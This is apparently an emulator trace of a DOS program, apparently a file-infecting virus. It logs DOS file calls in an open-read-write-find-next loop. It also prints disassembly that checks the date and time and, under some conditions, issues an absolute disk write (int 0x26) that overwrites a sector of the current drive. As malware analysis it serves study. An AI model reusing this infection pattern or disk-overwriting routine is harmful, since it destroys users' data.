2018-12-25T11:58:36.383376112Z 61 PC: 12b07 | Open file (See above)
2018-12-25T11:58:36.391100879Z 63 PC: 12b16 | Read file or device (See above)
2018-12-25T11:58:36.398847095Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T11:58:36.400563894Z 64 PC: 12b41 | Write file or device (See above)
2018-12-25T11:58:36.40454396Z 64 PC: 12b4c | Write file or device (See above)
2018-12-25T11:58:36.416300856Z 66 PC: 12b55 | Move file pointer (See above)
2018-12-25T11:58:36.417591233Z 64 PC: 12b73 | Write file or device (See above)
2018-12-25T11:58:36.426173676Z 62 PC: 12aef | Close file (See above)
2018-12-25T11:58:36.434328058Z 79 PC: 12afb | Find next file (See above)
2018-12-25T11:58:36.437080439Z 42 PC: 12ba1 | Get date
0x12ba1: cmp dl, 4
0x12ba4: jne 0x12bb0
0x12ba6: cmp dh, 7
0x12ba9: jne 0x12bb0
0x12bab: xor ax, ax
0x12bad: jmp 0x12bce
0x12baf: nop
0x12bb0: mov ah, 0x2c
0x12bb2: int 0x21
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
2018-12-25T11:58:36.440058865Z 44 PC: 12bb4 | Get time
0x12bb4: or cl, cl
0x12bb6: jne 0x12bdb
0x12bb8: cmp ch, 6
0x12bbb: jge 0x12bdb
0x12bbd: add cl, ch
0x12bbf: mov ax, cx
0x12bc1: cwde
0x12bc2: add al, dh
0x12bc4: adc al, dl
0x12bc6: adc ah, 0
0x12bc9: or ax, ax
0x12bcb: jne 0x12bce
0x12bcd: inc ax
0x12bce: mov dx, ax
0x12bd0: mov cx, 1
0x12bd3: xor bx, bx
0x12bd5: mov ah, 0x19
0x12bd7: int 0x21
0x12bd9: int 0x26
0x12bdb: mov bx, 0x31a
2018-12-25T11:58:36.442498143Z 44 PC: 12be2 | Get time
0x12be2: inc dh
0x12be4: cmp dh, byte ptr [0x319]
0x12be8: jl 0x12bf0
0x12bea: sub dh, byte ptr [0x319]
0x12bee: jmp 0x12be4
0x12bf0: mov al, dh
0x12bf2: mov cl, al
0x12bf4: cwde
0x12bf5: shl ax, 1
0x12bf7: add bx, ax
0x12bf9: mov si, word ptr [bx]
0x12bfb: mov ch, byte ptr [si - 1]
0x12bfe: mov dx, si
0x12c00: mov ah, 9
0x12c02: int 0x21
0x12c04: cmp ch, 0
0x12c07: jne 0x12c0b
0x12c09: int 0x20
0x12c0b: cmp ch, 1
0x12c0e: jne 0x12c11
2018-12-25T11:58:36.44490384Z 9 PC: 12c04 | Display string (Could not find end pointer)
2018-12-25T11:58:36.450847886Z 26 PC: 12ab9 | Set disk transfer address